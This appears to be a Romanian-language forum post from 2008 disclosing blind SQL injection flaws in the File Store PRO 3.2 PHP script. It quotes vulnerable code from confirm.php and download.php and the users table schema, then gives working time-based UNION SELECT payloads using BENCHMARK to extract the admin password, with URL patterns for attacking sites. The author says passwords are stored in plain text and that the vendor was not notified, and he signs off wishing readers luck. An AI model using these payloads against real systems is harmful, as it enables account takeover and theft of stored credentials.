File Store PRO 3.2 Blind SQL Injection

vladiii · July 8, 2008

- Necesita drept de admin.

In /confirm.php:


$SQL="SELECT `".DB_PREFIX."users`.*, `".DB_PREFIX."file_list`.`filename`, `".DB_PREFIX."file_list`.`descript` ";
$SQL.=" FROM `".DB_PREFIX."file_list` LEFT JOIN `".DB_PREFIX."users` ON `".DB_PREFIX."file_list`.`user_id`=`".DB_PREFIX."users`.`id`";
$SQL.=" WHERE `".DB_PREFIX."file_list`.`id`='".$id."'";
if(!$mysql->query($SQL))
{
 exit($mysql->error);
}
if($mysql->num<=0)
{
 exit("Record not found");
}

Mai sus in cod avem:


if(isset($_GET["folder"]) && $_GET["folder"]!="") {
 $folder=$_GET["folder"];
} else {
  exit("Bad Request");
 }
if(isset($_GET["id"]) && $_GET["id"]!="") {
 $id=$_GET["id"];
} else {
  exit("Bad Request");
 }

// Validate all inputs
// Added by SepedaTua on June 01, 2006 - [url]http://www.sepedatua.info/[/url]
/********************** SepedaTua ****************************/

/* Fields:
$folder
$id
*/
$search = array ('@<script[^>]*?>.*?</script>@si',
                '@<[\/\!]*?[^<>]*?>@si',
                '@([\r\n])[\s]+@',
                '@&(quot|#34);@i',
                '@&(amp|#38);@i',
                '@&(lt|#60);@i',
                '@&(gt|#62);@i',
                '@&(nbsp|#160);@i',
                '@&(iexcl|#161);@i',
                '@&(cent|#162);@i',
                '@&(pound|#163);@i',
                '@&(copy|#169);@i',
                '@(\d+);@e');

$replace = array ('',
                 '',
                 '\1',
                 '"',
                 '&',
                 '<',
                 '>',
                 ' ',
                 chr(161),
                 chr(162),
                 chr(163),
                 chr(169),
                 'chr(\1)');

$ffolder = $folder;
$fid = $id;

$folder = preg_replace($search, $replace, $folder);
$id = preg_replace($search, $replace, $id);

Filtrarea este deci de 2 bani... Trecand peste asta, sa vedem tabela cu useri:


Create table fstore_users  (
	id Integer(11) NOT NULL AUTO_INCREMENT,
	real_name Varchar(128) ,
	company Varchar(128) ,
	address1 Varchar(128) ,
	address2 Varchar(128) ,
	city Varchar(128) ,
	state Varchar(128) ,
	postcode Varchar(128) ,
	country Varchar(128) ,
	telephone Varchar(128) ,
	login Varchar(64) ,
	password Varchar(64) ,
	email Varchar(128) ,
	level Integer(11) ,
	confirm Char(1)  DEFAULT 'N' ,
	allow_upload Char(1)  DEFAULT 'N' ,
	subscription char(1) default 'N' ,
 Primary Key (id)
);

In sintaxa SQL vom avea 19 coloane. *=17 + 1 + 1.

Sintaxa va fi:


' UNION SELECT IF (SUBSTRING(password, 1, 1)='a', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from fstore_users where login='admin


[url]http://site.xxx/confirm.php?folder=a&id=[/url][SQL]

Partea frumoasa este ca parolele sunt tinute ca plain text in baza de date.

Puteti downloada softul* de aici (versiunea trial, "full" costa 60$):


[url]http://webscripts.softpedia.com/script/File-Management-Perl/-1-File-Store-PRO-45963.html[/url]

*A aparut acum cateva zile, este nou.

Necesita magic_quotes_gpc = off. Nu l-am contactat pe cel care se ocupa cu acest script. Nici la milw0rm nu am trimis.

- Nu necesita drept de admin.

In /download.php:


if(!isset($_GET["sig"])) // direct download, no need to login
$MustLogin=1|2|4;
require_once("libs/header.php");
if(!isset($_GET["sig"])) // direct download, no need to login
$userlevel=$CurUser->getlevel();
$SQL="SELECT * FROM `".DB_PREFIX."file_list` WHERE `id`='".$fileid."'";
if(!$mysql->query($SQL))
{
 exit($mysql->error);
}

$fileid este preluat prin $_GET si i se aplica aceeasi filtrare. Sintaxa:


' UNION SELECT IF (SUBSTRING(password, 1, 1)='b', BENCHMARK(100000000, ENCODE('a','b')), 1 ),2,3,4,5,6,7,8,9,10,11 from fstore_users where login='admin


[url]http://site.xxx/download.php?id=[/url][SQL]

Bafta !

P.S. Scriptul este plin de blind sql injection !

Sign In

File Store PRO 3.2 Blind SQL Injection

Recommended Posts

vladiii

Join the conversation

Browse

Activity

Pages